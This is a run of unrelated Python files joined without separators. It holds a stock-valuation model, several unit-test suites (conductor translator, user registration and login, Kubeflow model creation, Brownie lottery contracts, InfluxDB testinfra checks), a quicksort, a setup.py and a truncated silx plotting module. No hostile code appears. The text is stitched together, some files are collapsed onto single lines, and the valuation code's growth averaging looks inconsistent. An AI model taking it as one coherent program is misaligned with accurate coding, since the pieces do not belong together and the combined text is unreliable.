flask.g.db.execute(sqlalchemy.text("DELETE FROM hassle_roommates")) flask.g.db.execute(sqlalchemy.text("DELETE FROM hassle_events")) flask.g.db.execute(sqlalchemy.text("DELETE FROM hassle_participants")) flask.g.db.execute(sqlalchemy.text("DELETE FROM hassle_rooms"))
"""
code : company code
name : company name
liabilities_risk_ratio : risk multiplier applied to current liabilities
totalStockCount : current total number of shares outstanding
df : DataFrame in which the company's value is recorded for each year
goal_rate_of_return : ?? needs another look!!
"""
import FilePathManager as fm
import pandas as pd
from decimal import *
import os
import pickle


class Model(object):

    def __init__(self, liabilities_risk_ratio=1.2, goal_rate_of_return=0.06):
        self.liabilities_risk_ratio = liabilities_risk_ratio
        self.goal_rate_of_return = goal_rate_of_return

    """
    The list of data extracted from the income statement.
    Because each item can appear under several different names, it also
    carries the list of line items it can be computed from.
    """
    def getISDataColumns(self):
        # '영업이익' = operating profit; the inner keys are the statement
        # lines it may be reported under (profit (loss), profit, loss).
        return {
            '영업이익': {
                '영업이익(손실)': 0,
                '영업이익': 0,
                '영업손실': 0
            }
        }

    """
    The list of data extracted from the balance sheet.
    Because each item can appear under several different names, it also
    carries the list of line items it can be computed from.
    """
    def getBSDataColumns(self):
        # Keys: '유동자산' = current assets, '투자자산' = investment assets,
        # '유동부채' = current liabilities, '비유동부채' = non-current liabilities.
        return {
            '유동자산': {'유동자산': 0},
            '투자자산': {
                '장기매도가능금융자산': 0,  # long-term available-for-sale financial assets
                '만기보유금융자산': 0,  # held-to-maturity financial assets
                '상각후원가금융자산': 0,  # financial assets at amortized cost
                '기타포괄손익-공정가치금융자산': 0,  # financial assets at fair value through OCI
                '당기손익-공정가치금융자산': 0,  # financial assets at fair value through profit or loss
                '관계기업 및 공동기업 투자': 0,  # investments in associates and joint ventures
            },
            '유동부채': {'유동부채': 0},
            '비유동부채': {'비유동부채': 0},
        }

    def getDFindex(self):
        # current assets, investment assets, current liabilities,
        # non-current liabilities, operating profit, company value
        return ['유동자산', '투자자산', '유동부채', '비유동부채', '영업이익', '회사가치']

    """
    Analyzes up to four years of value, starting from the most recent quarter.
    The average value growth over those four years is added to the most recent
    quarter's value; the weight is (number of years / 4), so it shrinks when
    fewer than four years are available.
    The average of the future value and the current value is used as the final
    valuation.
    A rate of return is computed for each of the future, current, and average
    values.
    """
    def calculateCompanyValue(self, df, company):
        for column in df.columns:
            data = df.loc[:, column]
            value = (data['유동자산'] + data['투자자산']
                     - data['유동부채'] * Decimal(self.liabilities_risk_ratio)
                     - data['비유동부채'])
            if data['영업이익'] > 0:
                value += data['영업이익'] * Decimal(0.6) / Decimal(self.goal_rate_of_return)
            df.loc['회사가치', [column]] = value

        # TODO- columns SORT
        self._info = {}
        for column in df.columns:
            self._info[column] = Decimal(df.loc['회사가치', column])

        valueDiffSum = Decimal(0)
        for index in range(1, min(4, len(df.columns) - 1)):
            valueDiffSum += Decimal(
                df.loc['회사가치', df.columns[index]] - df.loc['회사가치', df.columns[index - 1]]
            )
        if valueDiffSum != 0:
            valueDiffSum /= Decimal(3)

        self.currentValue = Decimal(df.loc['회사가치', df.columns[0]])
        self.feautureValue = self.currentValue + valueDiffSum
        self.avgValue = (self.feautureValue + Decimal(df.loc['회사가치', df.columns[0]])) / Decimal(2)

        self.currentReturnRatio = Decimal(100) * ((self.currentValue - company.recentTotalStockPrice) / company.recentTotalStockPrice)
        self.featureReturnRatio = Decimal(100) * ((self.feautureValue - company.recentTotalStockPrice) / company.recentTotalStockPrice)
        self.avgReturnRatio = Decimal(100) * ((self.avgValue - company.recentTotalStockPrice) / company.recentTotalStockPrice)

        self.vb_cur_sp = self.currentValue / company.totalStockCount
        self.vb_fea_sp = self.feautureValue / company.totalStockCount
        self.vb_avg_sp = self.avgValue / company.totalStockCount

        self.writeToInfo()
        return df

    def writeToInfo(self):
        self._info['현재가치'] = self.currentValue  # current value
        self._info['미래가치'] = self.feautureValue  # future value
        self._info['평균가치'] = self.avgValue  # average value
        self._info['현재수익률'] = self.currentReturnRatio  # current return (%)
        self._info['미래수익률'] = self.featureReturnRatio  # future return (%)
        self._info['평균수익률'] = self.avgReturnRatio  # average return (%)
        self._info['예상현재주가'] = self.vb_cur_sp  # expected current share price
        self._info['예상미래주가'] = self.vb_fea_sp  # expected future share price
        self._info['예상평균주가'] = self.vb_avg_sp  # expected average share price

    def isValuableCompany(self):
        return self.avgReturnRatio > Decimal(30)

    def to_Dict_info(self):
        return self._info
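
# In effect the model prices a company as: current assets + investment
# assets - current liabilities * risk ratio - non-current liabilities,
# plus 60% of operating profit capitalized at the goal rate of return
# when operating profit is positive. A toy check with made-up figures:
from decimal import Decimal

value = (Decimal(500) + Decimal(100)  # current assets + investments
         - Decimal(200) * Decimal("1.2")  # current liabilities * risk ratio
         - Decimal(150))  # non-current liabilities
value += Decimal(60) * Decimal("0.6") / Decimal("0.06")  # 36 / 0.06 = 600
assert value == Decimal(810)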
# # ------------------------------------------------------------------------ # Copyright (c) 2018 Intel Corporation Intellectual Property # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ------------------------------------------------------------------------- # """Test classes for translator_svc""" import unittest import uuid import time import futurist from mock import patch from mock import PropertyMock from conductor.controller.translator_svc import TranslatorService from conductor.common.models import plan from conductor.common.music import api from conductor.common.music.model import base from oslo_config import cfg def plan_prepare(conf): music = api.API() music.keyspace_create(keyspace=conf.keyspace) plan_tmp = base.create_dynamic_model( keyspace=conf.keyspace, baseclass=plan.Plan, classname="Plan") return plan_tmp class TestTranslatorServiceNoException(unittest.TestCase): @patch('conductor.common.music.model.base.Base.table_create') @patch('conductor.common.music.model.base.Base.insert') @patch('conductor.controller.translator_svc.TranslatorService._reset_template_status') def setUp(self, mock_reset, mock_insert, mock_table_create): cfg.CONF.set_override('polling_interval', 1, 'controller') cfg.CONF.set_override('keyspace', 'conductor') cfg.CONF.set_override('timeout', 10, 'controller') cfg.CONF.set_override('limit', 1, 'controller') cfg.CONF.set_override('concurrent', True, 'controller') cfg.CONF.set_override('keyspace', 'conductor_rpc', 'messaging_server') self.conf = cfg.CONF self.Plan = plan_prepare(self.conf) kwargs = self.Plan name = str(uuid.uuid4()) timeout = self.conf.controller.timeout recommend_max = self.conf.controller.limit template = None status = self.Plan.TEMPLATE self.mock_plan = self.Plan(name, timeout, recommend_max, template, status=status) self.translator_svc = TranslatorService( worker_id=1, conf=self.conf, plan_class=kwargs) self.translator_svc.music.keyspace_create(keyspace=self.conf.keyspace) # TODO(ruoyu) @patch('conductor.controller.translator.Translator.ok') def translate_complete(self, mock_ok_func): with patch('conductor.controller.translator.Translator.ok', new_callable=PropertyMock) as mock_ok: mock_ok.return_value = True mock_ok_func.return_value = True self.translator_svc.translate(self.mock_plan) self.assertEquals(self.mock_plan.status, 'translated') @patch('conductor.controller.translator.Translator.translate') @patch('conductor.controller.translator.Translator.error_message') @patch('conductor.common.music.model.base.Base.update') def test_translate_error(self, mock_row_update, mock_error, mock_trns): with patch('conductor.controller.translator.Translator.ok', new_callable=PropertyMock) as mock_ok: mock_ok.return_value = False mock_error.return_value = 'error' self.translator_svc.translate(self.mock_plan) self.assertEquals(self.mock_plan.status, 'error') def test_millisec_to_sec(self): self.assertEquals(self.translator_svc.millisec_to_sec(1000), 1) def test_current_time_seconds(self): self.assertEquals(self.translator_svc.current_time_seconds(), 
int(round(time.time()))) @patch('conductor.common.music.model.base.Base.insert') @patch('conductor.common.music.model.search.Query.get_plan_by_col') @patch('conductor.common.music.model.base.Base.update') def test_reset_template_status(self, mock_call, mock_update, mock_insert): mock_plan = self.Plan(str(uuid.uuid4()), self.conf.controller.timeout, self.conf.controller.limit, None, status=self.Plan.TRANSLATING) mock_call.return_value = mock_plan self.translator_svc._reset_template_status() mock_update.assert_called_once() @patch('conductor.controller.translator_svc.TranslatorService._gracefully_stop') def test_terminate(self, mock_stop): self.translator_svc.terminate() mock_stop.assert_called_once() self.assertFalse(self.translator_svc.running) @patch('conductor.controller.translator_svc.TranslatorService._restart') def test_reload(self, mock_restart): self.translator_svc.reload() mock_restart.assert_called_once() def tearDown(self): patch.stopall() if __name__ == '__main__': unittest.main()
from random import randint


def quicksort(array):
    if len(array) < 2:
        return array

    low, same, high = [], [], []
    pivot = array[randint(0, len(array) - 1)]

    for item in array:
        if item < pivot:
            low.append(item)
        elif item == pivot:
            same.append(item)
        elif item > pivot:
            high.append(item)

    return quicksort(low) + same + quicksort(high)


arr = list(map(int, input().split()))
print(quicksort(arr))
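
# Routing pivot-equal items into `same` is a three-way partition: duplicates
# are emitted once and never recursed on, so inputs dominated by repeated
# keys stay shallow. A quick illustrative sanity check (arbitrary input; the
# random pivot changes the recursion, never the result):
assert quicksort([5, 3, 8, 3, 1, 3]) == [1, 3, 3, 3, 5, 8]
assert quicksort([]) == []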
"""Role testing files using testinfra""" def test_config_directory(host): """Check config directory""" f = host.file("/etc/influxdb") assert f.is_directory assert f.user == "influxdb" assert f.group == "root" assert f.mode == 0o775 def test_data_directory(host): """Check data directory""" d = host.file("/var/lib/influxdb") assert d.is_directory assert d.user == "influxdb" assert d.group == "root" assert d.mode == 0o700 def test_backup_directory(host): """Check backup directory""" b = host.file("/var/backups/influxdb") assert b.is_directory assert b.user == "influxdb" assert b.group == "root" assert b.mode == 0o775 def test_influxdb_service(host): """Check InfluxDB service""" s = host.service("influxdb") assert s.is_running assert s.is_enabled def test_influxdb_docker_container(host): """Check InfluxDB docker container""" d = host.docker("influxdb.service").inspect() assert d["HostConfig"]["Memory"] == 1073741824 assert d["Config"]["Image"] == "influxdb:latest" assert d["Config"]["Labels"]["maintainer"] == "<EMAIL>" assert "INFLUXD_REPORTING_DISABLED=true" in d["Config"]["Env"] assert "internal" in d["NetworkSettings"]["Networks"] assert \ "influxdb" in d["NetworkSettings"]["Networks"]["internal"]["Aliases"] def test_backup(host): """Check if the backup runs successfully""" cmd = host.run("/usr/local/bin/backup-influxdb.sh") assert cmd.succeeded def test_backup_cron_job(host): """Check backup cron job""" f = host.file("/var/spool/cron/crontabs/root") assert "/usr/local/bin/backup-influxdb.sh" in f.content_string def test_restore(host): """Check if the restore runs successfully""" cmd = host.run("/usr/local/bin/restore-influxdb.sh") assert cmd.succeeded
#!/usr/bin/env python # -*- coding: utf-8 -*- import io import os import re from setuptools import setup, find_packages # classifiers = """\ # Development Status :: 4 - Beta # Programming Language :: Python # Programming Language :: Python :: 3 # Programming Language :: Python :: 3.4 # Programming Language :: Python :: 3.5 # Programming Language :: Python :: 3.6 # Programming Language :: Python :: 3.7 # Programming Language :: Python :: 3.8 # """ def _read(*parts, **kwargs): filepath = os.path.join(os.path.dirname(__file__), *parts) encoding = kwargs.pop('encoding', 'utf-8') with io.open(filepath, encoding=encoding) as fh: text = fh.read() return text def get_version(): version = re.search( r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', _read('bwtools', '__init__.py'), re.MULTILINE).group(1) return version def get_long_description(): return _read('README.md') def get_requirements(path): content = _read(path) return [ req for req in content.split("\n") if req != '' and not req.startswith('#') ] install_requires = get_requirements('requirements.txt') packages = find_packages() setup( name='bwtools', author='<NAME>', author_email='<EMAIL>', version=get_version(), license='MIT', description='tools for bigwigs', long_description=get_long_description(), long_description_content_type='text/markdown', keywords=['genomics', 'bioinformatics', 'Hi-C', 'analysis', 'cooler'], url='https://github.com/gspracklin/bwtools', zip_safe=False, # classifiers=[s.strip() for s in classifiers.split('\n') if s], packages=packages, install_requires=install_requires, entry_points={ 'console_scripts': [ 'bwtools = bwtools.cli:cli', ] } )
from app.tests.v1 import utils

test_utils = utils.Utils()


def test_user_register(client):
    ''' Test user registration '''
    response = client.post('api/v1/auth/user/register', json=test_utils.USER)
    json_data = response.get_json()
    assert response.status_code == 201
    assert json_data['status'] == 201
    assert isinstance(json_data['data'], list)
    assert json_data['data'][0]['message'] == 'User registered successfully'


def test_user_register_without_email(client):
    ''' Test user registration without email '''
    data = {
        'firstname': test_utils.USER['firstname'],
        'lastname': test_utils.USER['lastname'],
        'othername': test_utils.USER['othername'],
        'email': '',
        'phone_number': test_utils.USER['phone_number'],
        'is_admin': False,
        'is_politician': test_utils.USER['is_politician'],
        'password': test_utils.USER['password'],
    }
    response = client.post('api/v1/auth/user/register', json=data)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'Please provide your email'


def test_user_register_existing_email(client):
    ''' Test user registration with existing email '''
    data = {
        'firstname': test_utils.USER['firstname'],
        'lastname': test_utils.USER['lastname'],
        'othername': test_utils.USER['othername'],
        'email': test_utils.USER['email'],
        'phone_number': test_utils.USER['phone_number'],
        'is_admin': False,
        'is_politician': test_utils.USER['is_politician'],
        'password': test_utils.USER['password'],
    }
    client.post('api/v1/auth/user/register', json=test_utils.USER)
    response = client.post('api/v1/auth/user/register', json=data)
    json_data = response.get_json()
    assert response.status_code == 409
    assert json_data['status'] == 409
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'User already exists'


def test_user_register_taken_othername(client):
    ''' Test user registration with taken othername '''
    data = {
        'firstname': test_utils.USER['firstname'],
        'lastname': test_utils.USER['lastname'],
        'othername': test_utils.USER['othername'],
        'email': '<EMAIL>',
        'phone_number': test_utils.USER['phone_number'],
        'is_admin': False,
        'is_politician': test_utils.USER['is_politician'],
        'password': test_utils.USER['password'],
    }
    client.post('api/v1/auth/user/register', json=test_utils.USER)
    response = client.post('api/v1/auth/user/register', json=data)
    json_data = response.get_json()
    assert response.status_code == 409
    assert json_data['status'] == 409
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'The othername you chose is taken'


def test_user_register_invalid_email(client):
    ''' Test user registration with invalid email '''
    data = {
        'firstname': test_utils.USER['firstname'],
        'lastname': test_utils.USER['lastname'],
        'othername': test_utils.USER['othername'],
        'email': 'emailaddress',
        'phone_number': test_utils.USER['phone_number'],
        'is_admin': False,
        'is_politician': test_utils.USER['is_politician'],
        'password': test_utils.USER['password'],
    }
    response = client.post('api/v1/auth/user/register', json=data)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'email is invalid'


def test_user_register_invalid_number(client):
    ''' Test user registration with invalid number '''
    data = {
        'firstname': test_utils.USER['firstname'],
        'lastname': test_utils.USER['lastname'],
        'othername': test_utils.USER['othername'],
        'email': test_utils.USER['email'],
        # phone number should be 12 digits
        'phone_number': '234435',
        'is_admin': False,
        'is_politician': test_utils.USER['is_politician'],
        'password': test_utils.USER['password'],
    }
    response = client.post('api/v1/auth/user/register', json=data)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'phone_number is invalid'


def test_user_register_invalid_boolean_is_admin(client):
    ''' Test user registration with invalid type of is_admin '''
    data = {
        'firstname': test_utils.USER['firstname'],
        'lastname': test_utils.USER['lastname'],
        'othername': test_utils.USER['othername'],
        'email': test_utils.USER['email'],
        'phone_number': test_utils.USER['phone_number'],
        'is_admin': 'False',
        'is_politician': test_utils.USER['is_politician'],
        'password': test_utils.USER['password'],
    }
    response = client.post('api/v1/auth/user/register', json=data)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'is_admin needs to be boolean'


def test_user_register_invalid_boolean_is_politician(client):
    ''' Test user registration with invalid type of is_politician '''
    data = {
        'firstname': test_utils.USER['firstname'],
        'lastname': test_utils.USER['lastname'],
        'othername': test_utils.USER['othername'],
        'email': test_utils.USER['email'],
        'phone_number': test_utils.USER['phone_number'],
        'is_admin': test_utils.USER['is_admin'],
        'is_politician': 'False',
        'password': test_utils.USER['password'],
    }
    response = client.post('api/v1/auth/user/register', json=data)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'is_politician needs to be boolean'


def test_user_register_with_empty_payload(client):
    ''' Test user registration with empty payload '''
    data = {
    }
    response = client.post('api/v1/auth/user/register', json=data)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)


def test_user_register_with_no_payload(client):
    ''' Test user registration with no payload '''
    response = client.post('api/v1/auth/user/register')
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)


def test_admin_register(client):
    ''' Test admin registration '''
    response = client.post('api/v1/auth/user/register', json=test_utils.ADMIN)
    json_data = response.get_json()
    assert response.status_code == 201
    assert json_data['status'] == 201
    assert isinstance(json_data['data'], list)
    assert json_data['data'][0]['message'] == 'User registered successfully'


def test_politician_register(client):
    ''' Test politician registration '''
    response = client.post('api/v1/auth/user/register', json=test_utils.POLITICIAN)
    json_data = response.get_json()
    assert response.status_code == 201
    assert json_data['status'] == 201
    assert isinstance(json_data['data'], list)
    assert json_data['data'][0]['message'] == 'User registered successfully'


def test_user_login(client):
    ''' Test user login '''
    test_utils.register_user(client, 'user')
    data = {
        'email': test_utils.USER['email'],
        'password': test_utils.USER['password']
    }
    response = client.post('api/v1/auth/user/login', json=data)
    json_data = response.get_json()
    assert response.status_code == 200
    assert json_data['status'] == 200
    assert isinstance(json_data['data'], list)
    assert json_data['data'][0]['message'] == 'Successfull log in'
    assert json_data['data'][0]['auth_token'] is not None


def test_user_login_invalid_credentials(client):
    ''' Test user login with invalid credentials '''
    test_utils.register_user(client, 'user')
    data = {
        'email': test_utils.USER['email'],
        'password': '<PASSWORD>'
    }
    response = client.post('api/v1/auth/user/login', json=data)
    json_data = response.get_json()
    assert response.status_code == 401
    assert json_data['status'] == 401
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'Invalid credentials'


def test_user_login_with_empty_data(client):
    ''' Test user login with empty data '''
    test_utils.register_user(client, 'user')
    data = {
    }
    response = client.post('api/v1/auth/user/login', json=data)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'Provide email and password as json.'


def test_user_login_without_data(client):
    ''' Test user login without payload '''
    test_utils.register_user(client, 'user')
    response = client.post('api/v1/auth/user/login')
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'Provide email and password as json.'


def test_user_login_without_email(client):
    ''' Test user login without email '''
    test_utils.register_user(client, 'user')
    data = {
        'email': '',
        'password': test_utils.USER['password']
    }
    response = client.post('api/v1/auth/user/login', json=data)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'Please provide your email'


def test_user_login_without_password(client):
    ''' Test user login without password '''
    test_utils.register_user(client, 'user')
    data = {
        'email': test_utils.USER['email'],
        'password': ''
    }
    response = client.post('api/v1/auth/user/login', json=data)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'Please provide your password'


def test_user_login_with_invalid_email(client):
    ''' Test user login with invalid email '''
    test_utils.register_user(client, 'user')
    data = {
        'email': ' erw ',
        'password': test_utils.USER['password']
    }
    response = client.post('api/v1/auth/user/login', json=data)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'email is invalid'


def test_user_login_with_invalid_password(client):
    ''' Test user login with invalid password '''
    test_utils.register_user(client, 'user')
    data = {
        'email': test_utils.USER['email'],
        'password': ' '
    }
    response = client.post('api/v1/auth/user/login', json=data)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'password is invalid'
<filename>components/gcp/container/component_sdk/python/tests/google/ml_engine/test__create_model.py # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import mock import unittest from googleapiclient import errors from kfp_component.google.ml_engine import create_model CREATE_MODEL_MODULE = 'kfp_component.google.ml_engine._create_model' @mock.patch(CREATE_MODEL_MODULE + '.display.display') @mock.patch(CREATE_MODEL_MODULE + '.gcp_common.dump_file') @mock.patch(CREATE_MODEL_MODULE + '.KfpExecutionContext') @mock.patch(CREATE_MODEL_MODULE + '.MLEngineClient') class TestCreateModel(unittest.TestCase): def test_create_model_succeed(self, mock_mlengine_client, mock_kfp_context, mock_dump_json, mock_display): model = { 'name': 'mock_model', 'description': 'the mock model' } mock_mlengine_client().create_model.return_value = model result = create_model('mock_project', 'mock_model', model) self.assertEqual(model, result) def test_create_model_conflict_succeed(self, mock_mlengine_client, mock_kfp_context, mock_dump_json, mock_display): model = { 'name': 'mock_model', 'description': 'the mock model' } mock_mlengine_client().create_model.side_effect = errors.HttpError( resp = mock.Mock(status=409), content = b'conflict' ) mock_mlengine_client().get_model.return_value = model result = create_model('mock_project', 'mock_model', model) self.assertEqual(model, result) def test_create_model_conflict_fail(self, mock_mlengine_client, mock_kfp_context, mock_dump_json, mock_display): model = { 'name': 'mock_model', 'description': 'the mock model' } mock_mlengine_client().create_model.side_effect = errors.HttpError( resp = mock.Mock(status=409), content = b'conflict' ) changed_model = { 'name': 'mock_model', 'description': 'the changed mock model' } mock_mlengine_client().get_model.return_value = changed_model with self.assertRaises(errors.HttpError) as context: create_model('mock_project', 'mock_model', model) self.assertEqual(409, context.exception.resp.status) def test_create_model_use_context_id_as_name(self, mock_mlengine_client, mock_kfp_context, mock_dump_json, mock_display): context_id = 'context1' model = {} returned_model = { 'name': 'model_' + context_id } mock_mlengine_client().create_model.return_value = returned_model mock_kfp_context().__enter__().context_id.return_value = context_id create_model('mock_project', model=model) mock_mlengine_client().create_model.assert_called_with( project_id = 'mock_project', model = returned_model )
import pytest
from brownie import exceptions
from brownie.network.transaction import TransactionReceipt

from scripts.deploy import deploy_lottery
from scripts.useful.tools import get_account, wait_for_tx_confs
from tests.tools import only_local, LotteryState


def test_owner_can_start_lottery():
    only_local()
    # Init
    owner = get_account(0)
    contract = deploy_lottery(account=owner)

    # Core / Assert
    # --- Check lottery is closed
    assert contract.m_LotteryState() == LotteryState.CLOSED.value

    # Open lottery
    tx = TransactionReceipt(contract.startLottery({"from": owner}).txid)
    if tx.confirmations == 0:
        tx.wait(1)

    # --- Check lottery is opened
    assert contract.m_LotteryState() == LotteryState.OPENED.value


def test_unknown_cannot_start_lottery():
    only_local()
    # Init
    owner = get_account(0)
    bad_actor = get_account(1)
    contract = deploy_lottery(account=owner)

    # Core / Assert
    # --- Check lottery is closed
    assert contract.m_LotteryState() == LotteryState.CLOSED.value

    # Expecting failure
    with pytest.raises(exceptions.VirtualMachineError):
        wait_for_tx_confs(contract.startLottery({"from": bad_actor}).txid)

    # --- Check lottery is still closed
    assert contract.m_LotteryState() == LotteryState.CLOSED.value


def test_cannot_start_lottery_in_progress():
    only_local()
    # Init
    owner = get_account()
    contract = deploy_lottery(account=owner)

    # Core
    # --- Start lottery once
    wait_for_tx_confs(contract.startLottery({"from": owner}).txid)

    # --- Start lottery twice : Should fail.
    with pytest.raises(exceptions.VirtualMachineError):
        wait_for_tx_confs(contract.startLottery({"from": owner}).txid)
<gh_stars>1-10 # coding: utf-8 # /*########################################################################## # # Copyright (c) 2004-2019 European Synchrotron Radiation Facility # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # # ###########################################################################*/ """ :mod:`silx.gui.plot.actions.control` provides a set of QAction relative to control of a :class:`.PlotWidget`. The following QAction are available: - :class:`ColormapAction` - :class:`CrosshairAction` - :class:`CurveStyleAction` - :class:`GridAction` - :class:`KeepAspectRatioAction` - :class:`PanWithArrowKeysAction` - :class:`ResetZoomAction` - :class:`ShowAxisAction` - :class:`XAxisLogarithmicAction` - :class:`XAxisAutoScaleAction` - :class:`YAxisInvertedAction` - :class:`YAxisLogarithmicAction` - :class:`YAxisAutoScaleAction` - :class:`ZoomBackAction` - :class:`ZoomInAction` - :class:`ZoomOutAction` """ from __future__ import division __authors__ = ["<NAME>", "<NAME>", "<NAME>"] __license__ = "MIT" __date__ = "24/04/2018" from . import PlotAction import logging from silx.gui.plot import items from silx.gui.plot._utils import applyZoomToPlot as _applyZoomToPlot from silx.gui import qt from silx.gui import icons _logger = logging.getLogger(__name__) class ResetZoomAction(PlotAction): """QAction controlling reset zoom on a :class:`.PlotWidget`. 
:param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(ResetZoomAction, self).__init__( plot, icon='zoom-original', text='Reset Zoom', tooltip='Auto-scale the graph', triggered=self._actionTriggered, checkable=False, parent=parent) self._autoscaleChanged(True) plot.getXAxis().sigAutoScaleChanged.connect(self._autoscaleChanged) plot.getYAxis().sigAutoScaleChanged.connect(self._autoscaleChanged) def _autoscaleChanged(self, enabled): xAxis = self.plot.getXAxis() yAxis = self.plot.getYAxis() self.setEnabled(xAxis.isAutoScale() or yAxis.isAutoScale()) if xAxis.isAutoScale() and yAxis.isAutoScale(): tooltip = 'Auto-scale the graph' elif xAxis.isAutoScale(): # And not Y axis tooltip = 'Auto-scale the x-axis of the graph only' elif yAxis.isAutoScale(): # And not X axis tooltip = 'Auto-scale the y-axis of the graph only' else: # no axis in autoscale tooltip = 'Auto-scale the graph' self.setToolTip(tooltip) def _actionTriggered(self, checked=False): self.plot.resetZoom() class ZoomBackAction(PlotAction): """QAction performing a zoom-back in :class:`.PlotWidget` limits history. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(ZoomBackAction, self).__init__( plot, icon='zoom-back', text='Zoom Back', tooltip='Zoom back the plot', triggered=self._actionTriggered, checkable=False, parent=parent) self.setShortcutContext(qt.Qt.WidgetShortcut) def _actionTriggered(self, checked=False): self.plot.getLimitsHistory().pop() class ZoomInAction(PlotAction): """QAction performing a zoom-in on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(ZoomInAction, self).__init__( plot, icon='zoom-in', text='Zoom In', tooltip='Zoom in the plot', triggered=self._actionTriggered, checkable=False, parent=parent) self.setShortcut(qt.QKeySequence.ZoomIn) self.setShortcutContext(qt.Qt.WidgetShortcut) def _actionTriggered(self, checked=False): _applyZoomToPlot(self.plot, 1.1) class ZoomOutAction(PlotAction): """QAction performing a zoom-out on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(ZoomOutAction, self).__init__( plot, icon='zoom-out', text='Zoom Out', tooltip='Zoom out the plot', triggered=self._actionTriggered, checkable=False, parent=parent) self.setShortcut(qt.QKeySequence.ZoomOut) self.setShortcutContext(qt.Qt.WidgetShortcut) def _actionTriggered(self, checked=False): _applyZoomToPlot(self.plot, 1. / 1.1) class XAxisAutoScaleAction(PlotAction): """QAction controlling X axis autoscale on a :class:`.PlotWidget`. 
:param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(XAxisAutoScaleAction, self).__init__( plot, icon='plot-xauto', text='X Autoscale', tooltip='Enable x-axis auto-scale when checked.\n' 'If unchecked, x-axis does not change when reseting zoom.', triggered=self._actionTriggered, checkable=True, parent=parent) self.setChecked(plot.getXAxis().isAutoScale()) plot.getXAxis().sigAutoScaleChanged.connect(self.setChecked) def _actionTriggered(self, checked=False): self.plot.getXAxis().setAutoScale(checked) if checked: self.plot.resetZoom() class YAxisAutoScaleAction(PlotAction): """QAction controlling Y axis autoscale on a :class:`.PlotWidget`. :param plot: :class:`.PlotWidget` instance on which to operate :param parent: See :class:`QAction` """ def __init__(self, plot, parent=None): super(YAxisAutoScaleAction, self).__init__( plot, icon='plot-yauto', text='Y Autoscale', tooltip='Enable y-axis auto-scale when checked.\n' 'If unchecked, y-axis does not change when reseting zoom.', triggered=self._actionTriggered, checkable=True, parent=parent) self.setChecked(plot.getYAxis().isAutoScale()) plot.getYAxis().sigAutoScaleChanged.connect(self.setChecked) def _actionTriggered(self, checked=False): self.plot.getYAxis().setAutoScale(checked) if checked: self.plot.resetZoom() class XAxisLogarithmicAction(PlotAction): """QAction controlling X axis log scale on a 